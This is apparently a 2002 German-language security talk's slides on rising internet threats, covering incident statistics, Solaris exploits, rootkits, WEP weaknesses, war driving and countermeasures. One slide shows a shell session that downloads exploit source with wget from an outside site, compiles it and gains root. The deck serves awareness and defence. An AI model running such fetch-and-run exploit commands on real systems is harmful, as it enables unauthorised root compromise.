We are under attack, aren't we? Hans Schächl Senior Consultant kippdata informationstechnologie Gmbh, Bonn Security-Meeting 2002 kippdata informationstechnologie GmbH Bornheimer Straße 33a 53111 Bonn Telefon 0228 98549-0 Telefax 0228 98549-50 info@kippdata.de www.kippdata.de
Problemlage Hosts (Mio) 180 160 140 120 100 80 60 40 20 0 1,7 3,2 6,6 Hosts on the Internet (Quelle: http://www.isc.org/ds/) 12,8 19,5 36,7 56,2 93 125,8 162,1 93 94 95 96 97 98 99 2000 2001 2002 Jahr
Problemlage sicherheitsrelevante Vorfälle (Quelle: http://www.cert.org/stats/) an CERT/CC gemeldete Vorfälle 100000 90000 80000 70000 60000 50000 40000 30000 20000 10000 0 86272 52658 21756 6 132 252 406 8268 773 1334 2340 2412 2573 2134 3734 88 89 90 91 92 93 94 95 96 97 98 99 2000 2001 2002 Jahr 2002: Hochrechnung aus Q1/Q2 2002
Problemlage Schadensausmaß über 455 Mio US$ in 2002 bei 44% der Befragten! "For the fifth year in a row, more respondents (74%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (33%)" "Seventy percent of those attacked reported vandalism" (Quelle: CSI/FBI computer crime and security survey, 2002)
Problemlage Folgerungen noch immer hohe Dunkelziffer wachsende Wahrscheinlichkeit, als Ziel entdeckt zu werden Intention von "Angreifern" kaum vorhersagbar Angriffe werden professioneller, Tools frei verfügbar
Problemlage Gegenmaßnahmen Anti-Virus (98%) Firewalls (95%) physical Security (92%) Access Control (90%) IDS (61%) Encryption (53%) Digital Identification (42%) Biometrics (9%)
Lösung...
Und nun? Sicheres Gefühl?
Was die Firewall nicht sieht... local hacks: $ id uid=9001(foo) gid=9001(foouser) $ uname -srp SunOS 5.7 sparc $ wget http://anticode.com/solaris-exploits/admtool-26-27.c $ gcc -o hackthem admtool-26-27.c $./hackthem Jumping address = efffea90 # id uid=9001(foo) gid=9001(foouser) euid=0(root)
"Exploits" Now for the fun part! how to hack a box remotely www.kippdata.de Sun Solaris 7 Sun UltraSPARC II default Installation Apache Webserver
Alptraum "root compromise" Oder wie es Tripwire Inc. sagt:
Was geschah? login buffer overflow über telnetd http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f41987 22.01.2002 Buffer Overflow in cachefsd http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f44309 31.05.2002 "snmpxdmid" allows remote Root access http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f26981 22.01.2002
Backdoors Root-Kits der nächsten Generation Loadable Kernel Module versteckt seine eigene Anwesenheit und die anderer Prozesse, Files Trojaner / Backdoor z.b. ICMP Root Shell UDP Port 53 Tunnel HTTP Trojaner
Konsequenzen Patch-Management z.b. Sun Patch Manager http://www.sun.com/service/support/sw_only/patchmanager.html Filter, Proxy und Wrapper für Dienste stateful Firewall, Content Scanner, tcpwrapper etc. hardened OS / RBAC Sun JASS, ARGUS, Trusted Solaris und Co. Intrusion Detection Host-based (Tripwire), Netzwerk-basiert (SmartDefense)
"Exploits" Ohne Worte... http://www.google.com "windows exploits" -> 147.000 hits "linux exploits" -> 107.000 hits "solaris exploits" -> 36.300 hits
"Exploits" OS out of the box werden auch immer "härter" Solaris 2.5.1 -> 30 exploits 11'1996 erscheint Phrack #49: Aleph One / "Smashing The Stack For Fun And Profit" Solaris 2.6 -> 46 exploits Solaris 7 -> 18 exploits Solaris 8 -> 2 exploits Solaris 9 -> noch 0...
From war dialing to... John T. Draper AKA Captain Crunch
... war driving!
The new kid in town Wireless Insecurity 802.11 und WEP Wire Equivalent Privacy isn't! rc4 ist nicht schlecht - Implementierung in WEP schon... wer montiert RJ-45-Dosen an der Fassade? es hilft zur Zeit nur VPN auf IP-Layer Verschlüsselung auf Application Layer Warten auf WEPv2 / 802.1x?
WEP or not - you're scanned! vortex, 17.04.2001:"A Co-conspirator (you know who you are ;-) and I have performed initial scans (standing relatively still) in the major London financial district of Canary Wharf, and were shocked to have detected around 150 wireless devices - most of which were not even using WEP." "Shipley recently sat with a friend in his car in the Silicon Valley parking lot of <company>. They were using laptops loaded with special monitoring software to observe lots of <company>'s traffic, most of it coming from Windows machines. They were able to observe as someone transferred a file and someone else turned on an NT machine and received e-mail.""a <company> spokeswoman said later that any network heard that day was part of a <company> test, though she didn't know what was being tested, and added that the network was no longer operational."
... and mapped! San Francisco Bay Area
... auch in Bonn!
Literaturhinweise Building Internet Firewalls, Chapman und Zwicky, O'Reilly Practical Unix & Internet Security, Garfinkel und Spafford, O'Reilly Firewalls and Internet Security, Cheswick und Bellovin, Addison- Wesley TCP/IP Illustrated, W. Richard Stevens, Addison-Wesley Cracking DES, Electronic Frontier Foundation, O'Reilly Applied Cryptography, Bruce Schneier, John Wiley & Sons SSL and TLS, Eric Rescorla, Addison-Wesley Intrusion Signatures and Analysis, S. Northcutt, New Riders Pub.
Online-Ressourcen Sun Security Products http://www.sun.com/security/ Sun Recommended and Security Patches http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches Sun JASS Solaris Security Toolkit http://wwws.sun.com/software/security/jass/ CheckPoint Firewall-1 / VPN-1 http://www.checkpoint.com/ Firewalls Mailing Liste http://www.netsys.com/firewall.html Bugtraq Mailingliste http://www.securityfocus.com/forums/ Bundesamt für Sicherheit in der Informationstechnik http://www.bsi.bund.de/ CERT Coordination Center http://www.cert.org/ "The Design of a Secure Internet Gateway" v. Bill Cheswick http://cm.bell-labs.com/who/ches/papers/gateway.ps
Online-Ressourcen Solaris Fingerprint Database http://sunsolve.sun.com/pub-cgi/show.pl?target=content/content7 Sun Security BluePrints Online http://www.sun.com/solutions/blueprints/browsesubject.html#security Solaris and Tripwire http://www.sun.com/security/tripwire/ Tripwire for Servers http://www.tripwire.com/products/servers/index.cfml ARGUS http://www.argus-systems.com/product/ WEP Cypherpunk Vortrag bei den Black Hat Briefings 2001 http://www.cypherpunks.ca/bh2001/mgp00001.html InSecurity of the WEP Algorithm http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html Air Snort Quellen http://airsnort.sourceforge.net/ War dialing / war driving FAQ http://www.sans.org/infosecfaq/wireless/war.htm